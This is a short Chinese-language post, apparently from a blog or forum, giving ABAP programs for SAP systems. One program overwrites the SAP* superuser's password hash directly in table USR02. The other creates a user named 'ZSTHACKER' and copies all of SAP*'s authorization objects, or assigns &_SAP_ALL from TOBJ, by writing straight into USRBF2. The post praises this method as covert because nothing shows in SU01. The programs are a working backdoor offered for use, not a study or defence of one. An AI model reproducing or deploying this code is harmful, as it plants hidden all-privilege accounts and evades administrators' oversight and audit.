sap密码修改，创建用户

直接修改SAP*的密码为123.

report ZMODPWD.

tables :usr02 .

update usr02 set bcode = 'DF52478E6FF90EEB'

where BNAME = 'SAP*'.

 

------------------------------------------------------------------------------

 

建立用户ZSTHACKER(初始密码123qaz)并赋予SAP*用户的所有权限.

（通过程序随意建立用户并赋予所有权限的例子,此例的特点在于直接在用户授权对象表USRBF2中加入授权对象,使用SU01看不到任何迹象,隐蔽性较强.）

Program ZCRTUSER.

Data ZUSR02 like USR02 .

***1Create User ZSTHACKER according to DDIC

select single * into ZUSR02 from USR02

where BNAME = 'DDIC'.

ZUSR02-BNAME = 'ZSTHACKER'.

ZUSR02-Bcode = 'E3B796BB09F7901B' .

insert USR02 from ZUSR02 .

***2Copy Auth. Obj from SAP*(or other)

data ZUSRBF2 like USRBF2 occurs 0 with header line.

select * from USRBF2 into table ZUSRBF2

where BNAME = 'SAP*' .

Loop at ZUSRBF2.

 ZUSRBF2-BNAME = 'ZSTHACKER' . 

 Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.

endloop.

INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.

如果SAP*被修改,直接从Tobj将所有的授权对象赋给ZSTHACKER就可.

Data Ztobj like tobj occurs 0 with header line .

data zusrbf2 like usrbf2.

select * into table ztobj from tobj .

loop at ztobj.

 zusrbf2-mandt = sy-mandt.

 zusrbf2-bname = 'ZSTHACKER'.

 zusrbf2-objct = ztobj-objct.

 zusrbf2-auth ='&_SAP_ALL'.

 modify USRBF2 FROM zusrbf2 .

endloop .